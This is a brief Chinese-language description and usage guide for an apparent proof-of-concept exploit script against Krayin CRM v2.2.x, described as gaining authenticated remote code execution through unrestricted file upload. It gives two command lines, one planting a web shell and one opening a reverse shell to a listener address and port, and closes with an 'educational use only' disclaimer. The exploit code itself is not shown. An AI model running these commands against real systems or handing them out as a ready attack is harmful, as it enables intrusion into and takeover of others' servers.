针对 Krayin CRM v2.2.x 关键漏洞的 PoC 脚本,通过不受限制的文件上传实现经过认证的 RCE。
# Web shell
python3 exploit.py -u http://target.com -e [email protected] -p password123
# Reverse shell
python3 exploit.py -u http://target.com -e [email protected] -p password123 -l 10.10.10.10 -P 4444
仅供教育用途。